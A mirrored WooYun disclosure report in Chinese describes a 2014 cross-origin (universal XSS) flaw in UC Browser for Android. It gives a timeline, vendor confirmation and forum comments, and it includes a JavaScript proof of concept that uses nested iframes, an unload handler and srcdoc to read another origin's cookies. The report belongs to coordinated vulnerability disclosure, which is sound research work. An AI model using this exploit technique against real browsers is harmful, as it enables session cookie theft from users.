UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制)

admin
admin
admin
101400
文章
87
评论
2015年6月9日20:38:37评论399 views字数 219阅读0分43秒阅读模式
摘要

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-05: 厂商已经确认,细节仅向厂商公开
2014-09-08: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-10-30: 细节向核心白帽子及相关领域专家公开
2014-11-09: 细节向普通白帽子公开
2014-11-19: 细节向实习白帽子公开
2014-12-04: 细节向公众公开

漏洞概要 关注数(35) 关注此漏洞

缺陷编号: WooYun-2014-75143

漏洞标题: UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制) UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制)

相关厂商: UC Mobile

漏洞作者: 瘦蛟舞UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制)

提交时间: 2014-09-05 14:37

公开时间: 2014-12-04 14:38

漏洞类型: 远程代码执行

危害等级: 高

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

8人收藏

漏洞详情

披露状态:

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-05: 厂商已经确认,细节仅向厂商公开
2014-09-08: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-10-30: 细节向核心白帽子及相关领域专家公开
2014-11-09: 细节向普通白帽子公开
2014-11-19: 细节向实习白帽子公开
2014-12-04: 细节向公众公开

简要描述:

UC浏览器Android最新版(4.4)跨域漏洞,不受系统版本限制。

详细说明:

UC浏览器版本

UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制)

漏洞证明:

POC

code 区域 
<body>
     <script>
  parentFrame = document.body.appendChild(document.createElement("iframe"));
  helperFrame1 = parentFrame.contentDocument.body.appendChild(document.createElement("iframe"));
  helperFrame1.contentWindow.onunload = function() {
   container = document.createElement("div");
   targetFrame  = container.appendChild(document.createElement("iframe"));
   helperFrame2 = targetFrame.appendChild(document.createElement("iframe"));
   helperFrame2.src = "javascript:top.container.removeChild(top.targetFrame)";
   parentFrame.contentDocument.body.appendChild(container);
  }
  parentFrame.src = "http://**.**.**.**";
  parentFrame.onload = function() {
   parentFrame.onload = null;
 
   targetFrame.srcdoc = "<script>alert(parent.document.cookie)<//script>";
   targetFrame.contentWindow.location = "about:srcdoc";
  }
 </script>
 </body>

已测受影响系统:

android 4.2.2

android 4.4.2

UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制)

修复方案:

版权声明:转载请注明来源 瘦蛟舞@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-05 15:22

厂商回复:

漏洞存在,已连续研发处理,非常感谢!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-09-05 14:39 | zzR UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制) ( 核心白帽子 | Rank:1408 漏洞数:127 | 东方红**联盟欢迎你-0-)

    1

    owo,不忙么

  2. 2014-09-05 20:51 | phith0n UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制) ( 普通白帽子 | Rank:834 漏洞数:127 | 一个想当文人的黑客~)

    1

    这才是屌的!!

  3. 2014-09-06 13:32 | 瘦蛟舞 UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制) ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    1

    @zzR 就是忙这相关的了

  4. 2014-09-09 16:32 | 进击的zjx ( 普通白帽子 | Rank:1712 漏洞数:224 )

    0

    瘦瘦牛!我来围观

  5. 2014-09-09 17:22 | 瘦蛟舞 UC浏览器Android最新版(4.4)跨域漏洞(不受系统版本限制) ( 普通白帽子 | Rank:765 漏洞数:83 | 铁甲依然在)

    2

    @进击的zjx 好像 唯品会和大众点评在招人,都在上海~

  6. 2014-09-09 20:34 | 进击的zjx ( 普通白帽子 | Rank:1712 漏洞数:224 )

    1

    @瘦蛟舞 好像是的~ 三克油

  7. 2014-09-11 21:24 | bey0nd ( 普通白帽子 | Rank:941 漏洞数:148 | 相忘于江湖,不如相濡以沫)

    0

    nice

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin